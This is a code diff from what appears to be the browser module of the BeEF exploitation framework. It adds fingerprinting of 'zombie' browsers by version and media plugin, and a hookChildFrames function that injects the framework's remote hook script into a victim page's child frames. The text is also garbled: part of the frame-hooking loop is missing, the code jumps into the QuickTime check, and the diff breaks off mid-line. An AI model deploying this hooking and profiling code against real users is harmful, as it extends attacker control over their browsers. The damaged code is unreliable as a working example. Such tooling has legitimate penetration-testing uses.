beef.browser.isC15() + */ + isC15:function () { + return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 15) ? true : false); + }, + + /** + * Returns true if Chrome 16. + * @example: beef.browser.isC16() + */ + isC16:function () { + return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 16) ? true : false); + }, /** * Returns true if Chrome 17. * @example: beef.browser.isC17() */ - isC17: function() { - return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==17)?true:false); + isC17:function () { + return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 17) ? true : false); }, - /** - * Returns true if Chrome 18. - * @example: beef.browser.isC18() - */ - isC18: function() { - return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==18)?true:false); - }, + /** + * Returns true if Chrome 18. + * @example: beef.browser.isC18() + */ + isC18:function () { + return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 18) ? true : false); + }, - /** - * Returns true if Chrome 19. - * @example: beef.browser.isC19() - */ - isC19: function() { - return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==19)?true:false); - }, + /** + * Returns true if Chrome 19. + * @example: beef.browser.isC19() + */ + isC19:function () { + return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 19) ? true : false); + }, - /** - * Returns true if Chrome 20. - * @example: beef.browser.isC20() - */ - isC20: function() { - return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==20)?true:false); - }, + /** + * Returns true if Chrome for iOS 19. + * @example: beef.browser.isC19iOS() + */ + isC19iOS:function () { + return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 19) ? true : false); + }, + + /** + * Returns true if Chrome 20. + * @example: beef.browser.isC20() + */ + isC20:function () { + return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 20) ? true : false); + }, + + /** + * Returns true if Chrome for iOS 20. + * @example: beef.browser.isC20iOS() + */ + isC20iOS:function () { + return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 20) ? true : false); + }, /** * Returns true if Chrome 21. * @example: beef.browser.isC21() */ - isC21: function() { - return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==21)?true:false); + isC21:function () { + return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 21) ? true : false); + }, + + /** + * Returns true if Chrome for iOS 21. + * @example: beef.browser.isC21iOS() + */ + isC21iOS:function () { + return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 21) ? true : false); + }, + + /** + * Returns true if Chrome 22. + * @example: beef.browser.isC22() + */ + isC22:function () { + return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 22) ? true : false); + }, + + /** + * Returns true if Chrome for iOS 22. + * @example: beef.browser.isC22iOS() + */ + isC22iOS:function () { + return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 22) ? true : false); + }, + + /** + * Returns true if Chrome 23. + * @example: beef.browser.isC23() + */ + isC23:function () { + return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 23) ? true : false); + }, + + /** + * Returns true if Chrome for iOS 23. + * @example: beef.browser.isC23iOS() + */ + isC23iOS:function () { + return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 23) ? true : false); + }, + + /** + * Returns true if Chrome 24. + * @example: beef.browser.isC24() + */ + isC24:function () { + return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 24) ? true : false); + }, + + /** + * Returns true if Chrome for iOS 24. + * @example: beef.browser.isC24iOS() + */ + isC24iOS:function () { + return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 24) ? true : false); + }, + + /** + * Returns true if Chrome 25. + * @example: beef.browser.isC25() + */ + isC25:function () { + return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 25) ? true : false); + }, + + /** + * Returns true if Chrome for iOS 25. + * @example: beef.browser.isC25iOS() + */ + isC25iOS:function () { + return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 25) ? true : false); + }, + + /** + * Returns true if Chrome 26. + * @example: beef.browser.isC26() + */ + isC26:function () { + return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 26) ? true : false); + }, + + /** + * Returns true if Chrome for iOS 26. + * @example: beef.browser.isC26iOS() + */ + isC26iOS:function () { + return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 26) ? true : false); + }, + + /** + * Returns true if Chrome 27. + * @example: beef.browser.isC27() + */ + isC27:function () { + return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 27) ? true : false); + }, + + /** + * Returns true if Chrome for iOS 27. + * @example: beef.browser.isC27iOS() + */ + isC27iOS:function () { + return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 27) ? true : false); + }, + + /** + * Returns true if Chrome 28. + * @example: beef.browser.isC28() + */ + isC28:function () { + return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 28) ? true : false); + }, + + /** + * Returns true if Chrome for iOS 28. + * @example: beef.browser.isC28iOS() + */ + isC28iOS:function () { + return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 28) ? true : false); + }, + + /** + * Returns true if Chrome 29. + * @example: beef.browser.isC29() + */ + isC29:function () { + return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 29) ? true : false); + }, + + /** + * Returns true if Chrome for iOS 29. + * @example: beef.browser.isC29iOS() + */ + isC29iOS:function () { + return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 29) ? true : false); + }, + + /** + * Returns true if Chrome 30. + * @example: beef.browser.isC30() + */ + isC30:function () { + return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 30) ? true : false); + }, + + /** + * Returns true if Chrome for iOS 30. + * @example: beef.browser.isC30iOS() + */ + isC30iOS:function () { + return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 30) ? true : false); + }, + + /** + * Returns true if Chrome. + * @example: beef.browser.isC() + */ + isC:function () { + return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16() || this.isC17() || this.isC18() || this.isC19() || this.isC19iOS() || this.isC20() || this.isC20iOS() || this.isC21() || this.isC21iOS() || this.isC22() || this.isC22iOS() || this.isC23() || this.isC23iOS() || this.isC24() || this.isC24iOS() || this.isC25() || this.isC25iOS() || this.isC26() || this.isC26iOS() || this.isC27() || this.isC27iOS() || this.isC28() || this.isC28iOS() || this.isC29() || this.isC29iOS() || this.isC30() || this.isC30iOS(); + }, + + /** + * Returns true if Opera 9.50 through 9.52. + * @example: beef.browser.isO9_52() + */ + isO9_52:function () { + return (!!window.opera && (window.navigator.userAgent.match(/Opera\/9\.5/) != null)); + }, + + /** + * Returns true if Opera 9.60 through 9.64. + * @example: beef.browser.isO9_60() + */ + isO9_60:function () { + return (!!window.opera && (window.navigator.userAgent.match(/Opera\/9\.6/) != null)); + }, + + /** + * Returns true if Opera 10.xx. + * @example: beef.browser.isO10() + */ + isO10:function () { + return (!!window.opera && (window.navigator.userAgent.match(/Opera\/9\.80.*Version\/10\./) != null)); + }, + + /** + * Returns true if Opera 11.xx. + * @example: beef.browser.isO11() + */ + isO11:function () { + return (!!window.opera && (window.navigator.userAgent.match(/Opera\/9\.80.*Version\/11\./) != null)); + }, + + /** + * Returns true if Opera 12.xx. + * @example: beef.browser.isO12() + */ + isO12:function () { + return (!!window.opera && (window.navigator.userAgent.match(/Opera\/9\.80.*Version\/12\./) != null)); + }, + + /** + * Returns true if Opera. + * @example: beef.browser.isO() + */ + isO:function () { + return this.isO9_52() || this.isO9_60() || this.isO10() || this.isO11() || this.isO12(); + }, + + /** + * Returns the type of browser being used. + * @example: beef.browser.type().IE6 + * @example: beef.browser.type().FF + * @example: beef.browser.type().O + */ + type:function () { + + return { + C5:this.isC5(), // Chrome 5 + C6:this.isC6(), // Chrome 6 + C7:this.isC7(), // Chrome 7 + C8:this.isC8(), // Chrome 8 + C9:this.isC9(), // Chrome 9 + C10:this.isC10(), // Chrome 10 + C11:this.isC11(), // Chrome 11 + C12:this.isC12(), // Chrome 12 + C13:this.isC13(), // Chrome 13 + C14:this.isC14(), // Chrome 14 + C15:this.isC15(), // Chrome 15 + C16:this.isC16(), // Chrome 16 + C17:this.isC17(), // Chrome 17 + C18:this.isC18(), // Chrome 18 + C19:this.isC19(), // Chrome 19 + C19iOS:this.isC19iOS(), // Chrome 19 on iOS + C20:this.isC20(), // Chrome 20 + C20iOS:this.isC20iOS(), // Chrome 20 on iOS + C21:this.isC21(), // Chrome 21 + C21iOS:this.isC21iOS(), // Chrome 21 on iOS + C22:this.isC22(), // Chrome 22 + C22iOS:this.isC22iOS(), // Chrome 22 on iOS + C23:this.isC23(), // Chrome 23 + C23iOS:this.isC23iOS(), // Chrome 23 on iOS + C24:this.isC24(), // Chrome 24 + C24iOS:this.isC24iOS(), // Chrome 24 on iOS + C25:this.isC25(), // Chrome 25 + C25iOS:this.isC25iOS(), // Chrome 25 on iOS + C26:this.isC26(), // Chrome 26 + C26iOS:this.isC26iOS(), // Chrome 26 on iOS + C27:this.isC27(), // Chrome 27 + C27iOS:this.isC27iOS(), // Chrome 27 on iOS + C28:this.isC28(), // Chrome 28 + C28iOS:this.isC28iOS(), // Chrome 28 on iOS + C29:this.isC29(), // Chrome 29 + C29iOS:this.isC29iOS(), // Chrome 29 on iOS + C30:this.isC30(), // Chrome 30 + C30iOS:this.isC30iOS(), // Chrome 30 on iOS + C:this.isC(), // Chrome any version + + FF2:this.isFF2(), // Firefox 2 + FF3:this.isFF3(), // Firefox 3 + FF3_5:this.isFF3_5(), // Firefox 3.5 + FF3_6:this.isFF3_6(), // Firefox 3.6 + FF4:this.isFF4(), // Firefox 4 + FF5:this.isFF5(), // Firefox 5 + FF6:this.isFF6(), // Firefox 6 + FF7:this.isFF7(), // Firefox 7 + FF8:this.isFF8(), // Firefox 8 + FF9:this.isFF9(), // Firefox 9 + FF10:this.isFF10(), // Firefox 10 + FF11:this.isFF11(), // Firefox 11 + FF12:this.isFF12(), // Firefox 12 + FF13:this.isFF13(), // Firefox 13 + FF14:this.isFF14(), // Firefox 14 + FF15:this.isFF15(), // Firefox 15 + FF16:this.isFF16(), // Firefox 16 + FF17:this.isFF17(), // Firefox 17 + FF18:this.isFF18(), // Firefox 18 + FF19:this.isFF19(), // Firefox 19 + FF20:this.isFF20(), // Firefox 20 + FF21:this.isFF21(), // Firefox 21 + FF22:this.isFF22(), // Firefox 22 + FF23:this.isFF23(), // Firefox 23 + FF24:this.isFF24(), // Firefox 24 + FF25:this.isFF25(), // Firefox 25 + FF:this.isFF(), // Firefox any version + + IE6:this.isIE6(), // Internet Explorer 6 + IE7:this.isIE7(), // Internet Explorer 7 + IE8:this.isIE8(), // Internet Explorer 8 + IE9:this.isIE9(), // Internet Explorer 9 + IE10:this.isIE10(), // Internet Explorer 10 + IE:this.isIE(), // Internet Explorer any version + + O9_52:this.isO9_52(), // Opera 9.50 through 9.52 + O9_60:this.isO9_60(), // Opera 9.60 through 9.64 + O10:this.isO10(), // Opera 10.xx + O11:this.isO11(), // Opera 11.xx + O12:this.isO12(), // Opera 11.xx + O:this.isO(), // Opera any version + + S4:this.isS4(), // Safari 4.xx + S5:this.isS5(), // Safari 5.xx + S6:this.isS6(), // Safari 6.x + S:this.isS() // Safari any version + } + }, + + /** + * Returns the type of browser being used. + * @return: {String} User agent software and version. + * + * @example: beef.browser.getBrowserVersion() + */ + getBrowserVersion:function () { + + if (this.isC5()) { + return '5' + } + ; // Chrome 5 + if (this.isC6()) { + return '6' + } + ; // Chrome 6 + if (this.isC7()) { + return '7' + } + ; // Chrome 7 + if (this.isC8()) { + return '8' + } + ; // Chrome 8 + if (this.isC9()) { + return '9' + } + ; // Chrome 9 + if (this.isC10()) { + return '10' + } + ; // Chrome 10 + if (this.isC11()) { + return '11' + } + ; // Chrome 11 + if (this.isC12()) { + return '12' + } + ; // Chrome 12 + if (this.isC13()) { + return '13' + } + ; // Chrome 13 + if (this.isC14()) { + return '14' + } + ; // Chrome 14 + if (this.isC15()) { + return '15' + } + ; // Chrome 15 + if (this.isC16()) { + return '16' + } + ; // Chrome 16 + if (this.isC17()) { + return '17' + } + ; // Chrome 17 + if (this.isC18()) { + return '18' + } + ; // Chrome 18 + if (this.isC19()) { + return '19' + } + ; // Chrome 19 + if (this.isC19iOS()) { + return '19' + } + ; // Chrome 19 for iOS + if (this.isC20()) { + return '20' + } + ; // Chrome 20 + if (this.isC20iOS()) { + return '20' + } + ; // Chrome 20 for iOS + if (this.isC21()) { + return '21' + } + ; // Chrome 21 + if (this.isC21iOS()) { + return '21' + } + ; // Chrome 21 for iOS + if (this.isC22()) { + return '22' + } + ; // Chrome 22 + if (this.isC22iOS()) { + return '22' + } + ; // Chrome 22 for iOS + if (this.isC23()) { + return '23' + } + ; // Chrome 23 + if (this.isC23iOS()) { + return '23' + } + ; // Chrome 23 for iOS + if (this.isC24()) { + return '24' + } + ; // Chrome 24 + if (this.isC24iOS()) { + return '24' + } + ; // Chrome 24 for iOS + if (this.isC25()) { + return '25' + } + ; // Chrome 25 + if (this.isC25iOS()) { + return '25' + } + ; // Chrome 25 for iOS + if (this.isC26()) { + return '26' + } + ; // Chrome 26 + if (this.isC26iOS()) { + return '26' + } + ; // Chrome 26 for iOS + if (this.isC27()) { + return '27' + } + ; // Chrome 27 + if (this.isC27iOS()) { + return '27' + } + ; // Chrome 27 for iOS + if (this.isC28()) { + return '28' + } + ; // Chrome 28 + if (this.isC28iOS()) { + return '28' + } + ; // Chrome 28 for iOS + if (this.isC29()) { + return '29' + } + ; // Chrome 29 + if (this.isC29iOS()) { + return '29' + } + ; // Chrome 29 for iOS + if (this.isC30()) { + return '30' + } + ; // Chrome 30 + if (this.isC30iOS()) { + return '30' + } + ; // Chrome 30 for iOS + if (this.isFF2()) { + return '2' + } + ; // Firefox 2 + if (this.isFF3()) { + return '3' + } + ; // Firefox 3 + if (this.isFF3_5()) { + return '3.5' + } + ; // Firefox 3.5 + if (this.isFF3_6()) { + return '3.6' + } + ; // Firefox 3.6 + if (this.isFF4()) { + return '4' + } + ; // Firefox 4 + if (this.isFF5()) { + return '5' + } + ; // Firefox 5 + if (this.isFF6()) { + return '6' + } + ; // Firefox 6 + if (this.isFF7()) { + return '7' + } + ; // Firefox 7 + if (this.isFF8()) { + return '8' + } + ; // Firefox 8 + if (this.isFF9()) { + return '9' + } + ; // Firefox 9 + if (this.isFF10()) { + return '10' + } + ; // Firefox 10 + if (this.isFF11()) { + return '11' + } + ; // Firefox 11 + if (this.isFF12()) { + return '12' + } + ; // Firefox 12 + if (this.isFF13()) { + return '13' + } + ; // Firefox 13 + if (this.isFF14()) { + return '14' + } + ; // Firefox 14 + if (this.isFF15()) { + return '15' + } + ; // Firefox 15 + if (this.isFF16()) { + return '16' + } + ; // Firefox 16 + if (this.isFF17()) { + return '17' + } + ; // Firefox 17 + if (this.isFF18()) { + return '18' + } + ; // Firefox 18 + if (this.isFF19()) { + return '19' + } + ; // Firefox 19 + if (this.isFF20()) { + return '20' + } + ; // Firefox 20 + if (this.isFF21()) { + return '21' + } + ; // Firefox 21 + if (this.isFF22()) { + return '22' + } + ; // Firefox 22 + if (this.isFF23()) { + return '23' + } + ; // Firefox 23 + if (this.isFF24()) { + return '24' + } + ; // Firefox 24 + if (this.isFF25()) { + return '25' + } + ; // Firefox 25 + + if (this.isIE6()) { + return '6' + } + ; // Internet Explorer 6 + if (this.isIE7()) { + return '7' + } + ; // Internet Explorer 7 + if (this.isIE8()) { + return '8' + } + ; // Internet Explorer 8 + if (this.isIE9()) { + return '9' + } + ; // Internet Explorer 9 + if (this.isIE10()) { + return '10' + } + ; // Internet Explorer 10 + + if (this.isS4()) { + return '4' + } + ; // Safari 4 + if (this.isS5()) { + return '5' + } + ; // Safari 5 + if (this.isS6()) { + return '6' + } + ; // Safari 6 + + if (this.isO9_52()) { + return '9.5' + } + ; // Opera 9.5x + if (this.isO9_60()) { + return '9.6' + } + ; // Opera 9.6 + if (this.isO10()) { + return '10' + } + ; // Opera 10.xx + if (this.isO11()) { + return '11' + } + ; // Opera 11.xx + if (this.isO12()) { + return '12' + } + ; // Opera 12.xx + + return 'UNKNOWN'; // Unknown UA + }, + + /** + * Returns the type of user agent by hooked browser. + * @return: {String} User agent software. + * + * @example: beef.browser.getBrowserName() + */ + getBrowserName:function () { + + if (this.isC()) { + return 'C' + } + ; // Chrome any version + if (this.isFF()) { + return 'FF' + } + ; // Firefox any version + if (this.isIE()) { + return 'IE' + } + ; // Internet Explorer any version + if (this.isO()) { + return 'O' + } + ; // Opera any version + if (this.isS()) { + return 'S' + } + ; // Safari any version + return 'UNKNOWN'; // Unknown UA + }, + + /** + * Hooks all child frames in the current window + * Restricted by same-origin policy + */ + hookChildFrames:function () { + + // create script object + var script = document.createElement('script'); + script.type = 'text/javascript'; + script.src = '<%== @beef_proto %>://<%== @beef_host %>:<%== @beef_port %><%== @hook_file %>'; + + // loop through child frames + for (var i=0;i= 0) { + quicktime = true; + } + + } + + // Internet Explorer + } else { + + try { + + var qt_test = new ActiveXObject('QuickTime.QuickTime'); + + } catch (e) { + beef.debug("Creating QuickTime ActiveX object failed: "+e.message); + } + + if (qt_test) { + quicktime = true; + } + + } + + return quicktime; + + }, + + /** + * Checks if the zombie has the RealPlayer plugin installed. + * @return: {Boolean} true or false. + * + * @example: if ( beef.browser.hasRealPlayer() ) { ... } + */ + hasRealPlayer:function () { + + var realplayer = false; + + // Not Internet Explorer + if (!this.type().IE) { + + for (i = 0; i < navigator.plugins.length; i++) { + + if (navigator.plugins[i].name.indexOf("RealPlayer") >= 0) { + realplayer = true; + } + + } + + // Internet Explorer + } else { + + var definedControls = [ + 'RealPlayer', + 'rmocx.RealPlayer G2 Control', + 'rmocx.RealPlayer G2 Control.1', + 'RealPlayer.RealPlayer(tm) ActiveX Control (32-bit)', + 'RealVideo.RealVideo(tm) ActiveX Control (32-bit)' + ]; + + for (var i = 0; i < definedControls.length; i++) { + + try { + var rp_test = new ActiveXObject(definedControls[i]); + } catch (e) { + beef.debug("Creating RealPlayer ActiveX object failed: "+e.message); + } + + if ( rp_test ) { + realplayer = true; + + } + } + } + + return realplayer; + }, /** - * Returns true if Chrome. - * @example: beef.browser.isC() - */ - isC: function() { - return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16()|| this.isC17() || this.isC18() || this.isC19() || this.isC20() || this.isC21(); - }, - - /** - * Returns true if Opera 9.50 through 9.52. - * @example: beef.browser.isO9_52() - */ - isO9_52: function() { - return (!!window.opera && (window.navigator.userAgent.match(/Opera\/9\.5/) != null)); - }, - - /** - * Returns true if Opera 9.60 through 9.64. - * @example: beef.browser.isO9_60() - */ - isO9_60: function() { - return (!!window.opera && (window.navigator.userAgent.match(/Opera\/9\.6/) != null)); - }, - - /** - * Returns true if Opera 10.xx. - * @example: beef.browser.isO10() - */ - isO10: function() { - return (!!window.opera && (window.navigator.userAgent.match(/Opera\/9\.80.*Version\/10\./) != null)); - }, - - /** - * Returns true if Opera 11.xx. - * @example: beef.browser.isO11() - */ - isO11: function() { - return (!!window.opera && (window.navigator.userAgent.match(/Opera\/9\.80.*Version\/11\./) != null)); - }, - - /** - * Returns true if Opera 12.xx. - * @example: beef.browser.isO12() - */ - isO12: function() { - return (!!window.opera && (window.navigator.userAgent.match(/Opera\/9\.80.*Version\/12\./) != null)); - }, - - /** - * Returns true if Opera. - * @example: beef.browser.isO() - */ - isO: function() { - return this.isO9_52() || this.isO9_60() || this.isO10() || this.isO11() || this.isO12(); - }, - - /** - * Returns the type of browser being used. - * @example: beef.browser.type().IE6 - * @example: beef.browser.type().FF - * @example: beef.browser.type().O - */ - type: function() { - - return { - C5: this.isC5(), // Chrome 5 - C6: this.isC6(), // Chrome 6 - C7: this.isC7(), // Chrome 7 - C8: this.isC8(), // Chrome 8 - C9: this.isC9(), // Chrome 9 - C10: this.isC10(), // Chrome 10 - C11: this.isC11(), // Chrome 11 - C12: this.isC12(), // Chrome 12 - C13: this.isC13(), // Chrome 13 - C14: this.isC14(), // Chrome 14 - C15: this.isC15(), // Chrome 15 - C16: this.isC16(), // Chrome 16 - C17: this.isC17(), // Chrome 17 - C18: this.isC18(), // Chrome 18 - C19: this.isC19(), // Chrome 19 - C20: this.isC20(), // Chrome 20 - C21: this.isC21(), // Chrome 21 - C: this.isC(), // Chrome any version - - FF2: this.isFF2(), // Firefox 2 - FF3: this.isFF3(), // Firefox 3 - FF3_5: this.isFF3_5(), // Firefox 3.5 - FF3_6: this.isFF3_6(), // Firefox 3.6 - FF4: this.isFF4(), // Firefox 4 - FF5: this.isFF5(), // Firefox 5 - FF6: this.isFF6(), // Firefox 6 - FF7: this.isFF7(), // Firefox 7 - FF8: this.isFF8(), // Firefox 8 - FF9: this.isFF9(), // Firefox 9 - FF10: this.isFF10(), // Firefox 10 - FF11: this.isFF11(), // Firefox 11 - FF12: this.isFF12(), // Firefox 12 - FF13: this.isFF13(), // Firefox 13 - FF14: this.isFF14(), // Firefox 14 - FF: this.isFF(), // Firefox any version - - IE6: this.isIE6(), // Internet Explorer 6 - IE7: this.isIE7(), // Internet Explorer 7 - IE8: this.isIE8(), // Internet Explorer 8 - IE9: this.isIE9(), // Internet Explorer 9 - IE: this.isIE(), // Internet Explorer any version - - O9_52: this.isO9_52(), // Opera 9.50 through 9.52 - O9_60: this.isO9_60(), // Opera 9.60 through 9.64 - O10: this.isO10(), // Opera 10.xx - O11: this.isO11(), // Opera 11.xx - O12: this.isO12(), // Opera 11.xx - O: this.isO(), // Opera any version - - S4: this.isS4(), // Safari 4.xx - S5: this.isS5(), // Safari 5.xx - S6: this.isS6(), // Safari 6.x - S: this.isS() // Safari any version - } - }, - - /** - * Returns the type of browser being used. - * @return: {String} User agent software and version. - * - * @example: beef.browser.getBrowserVersion() - */ - getBrowserVersion: function() { - - if (this.isC5()) { return '5' }; // Chrome 5 - if (this.isC6()) { return '6' }; // Chrome 6 - if (this.isC7()) { return '7' }; // Chrome 7 - if (this.isC8()) { return '8' }; // Chrome 8 - if (this.isC9()) { return '9' }; // Chrome 9 - if (this.isC10()) { return '10' }; // Chrome 10 - if (this.isC11()) { return '11' }; // Chrome 11 - if (this.isC12()) { return '12' }; // Chrome 12 - if (this.isC13()) { return '13' }; // Chrome 13 - if (this.isC14()) { return '14' }; // Chrome 14 - if (this.isC15()) { return '15' }; // Chrome 15 - if (this.isC16()) { return '16' }; // Chrome 16 - if (this.isC17()) { return '17' }; // Chrome 17 - if (this.isC18()) { return '18' }; // Chrome 18 - if (this.isC19()) { return '19' }; // Chrome 19 - if (this.isC20()) { return '20' }; // Chrome 20 - if (this.isC21()) { return '21' }; // Chrome 21 - - if (this.isFF2()) { return '2' }; // Firefox 2 - if (this.isFF3()) { return '3' }; // Firefox 3 - if (this.isFF3_5()) { return '3.5'}; // Firefox 3.5 - if (this.isFF3_6()) { return '3.6'}; // Firefox 3.6 - if (this.isFF4()) { return '4' }; // Firefox 4 - if (this.isFF5()) { return '5' }; // Firefox 5 - if (this.isFF6()) { return '6' }; // Firefox 6 - if (this.isFF7()) { return '7' }; // Firefox 7 - if (this.isFF8()) { return '8' }; // Firefox 8 - if (this.isFF9()) { return '9' }; // Firefox 9 - if (this.isFF10()) { return '10' }; // Firefox 10 - if (this.isFF11()) { return '11' }; // Firefox 11 - if (this.isFF12()) { return '12' }; // Firefox 12 - if (this.isFF13()) { return '13' }; // Firefox 13 - if (this.isFF14()) { return '14' }; // Firefox 14 - - if (this.isIE6()) { return '6' }; // Internet Explorer 6 - if (this.isIE7()) { return '7' }; // Internet Explorer 7 - if (this.isIE8()) { return '8' }; // Internet Explorer 8 - if (this.isIE9()) { return '9' }; // Internet Explorer 9 - - if (this.isS4()) { return '4' }; // Safari 4 - if (this.isS5()) { return '5' }; // Safari 5 - if (this.isS6()) { return '6' }; // Safari 5 - - if (this.isO9_52()) { return '9.5'}; // Opera 9.5x - if (this.isO9_60()) { return '9.6'}; // Opera 9.6 - if (this.isO10()) { return '10' }; // Opera 10.xx - if (this.isO11()) { return '11' }; // Opera 11.xx - if (this.isO12()) { return '12' }; // Opera 12.xx - - return 'UNKNOWN'; // Unknown UA - }, - - /** - * Returns the type of user agent by hooked browser. - * @return: {String} User agent software. - * - * @example: beef.browser.getBrowserName() - */ - getBrowserName: function() { - - if (this.isC()) { return 'C' }; // Chrome any version - if (this.isFF()) { return 'FF'}; // Firefox any version - if (this.isIE()) { return 'IE'}; // Internet Explorer any version - if (this.isO()) { return 'O' }; // Opera any version - if (this.isS()) { return 'S' }; // Safari any version - return 'UN'; // Unknown UA - }, - - /** - * Checks if the zombie has flash installed and enabled. + * Checks if the zombie has the Windows Media Player plugin installed. * @return: {Boolean} true or false. * - * @example: if(beef.browser.hasFlash()) { ... } + * @example: if ( beef.browser.hasWMP() ) { ... } */ - hasFlash: function() { - if (!this.type().IE) { - return (navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"]); - } else { - flash_versions = 11; - flash_installed = false; + hasWMP:function () { + + var wmp = false; + + // Not Internet Explorer + if (!this.type().IE) { + + for (i = 0; i < navigator.plugins.length; i++) { + + if (navigator.plugins[i].name.indexOf("Windows Media Player") >= 0) { + wmp = true; + } + + } + + // Internet Explorer + } else { + + try { + + var wmp_test = new ActiveXObject('WMPlayer.OCX'); + + } catch (e) { + beef.debug("Creating WMP ActiveX object failed: "+e.message); + } + + if (wmp_test) { + wmp = true; + } + + } + + return wmp; - if (window.ActiveXObject) { - for (x = 2; x <= flash_versions; x++) { - try { - Flash = eval("new ActiveXObject('ShockwaveFlash.ShockwaveFlash." + x + "');"); - if (Flash) { - flash_installed = true; - } - } - catch(e) { } - } - }; - return flash_installed; - } }, - /** - * Checks if the zombie has Java enabled. - * @return: {Boolean} true or false. + /** + * Checks if VLC is installed + * @return: {Boolean} true or false + **/ + hasVLC:function() { + var vlc = false ; + if(!this.type().IE) { + for (i = 0; i < navigator.plugins.length; i++) { + if (navigator.plugins[i].name.indexOf("VLC") >= 0) { + vlc = true; + } + } + } else { + try { + control = new 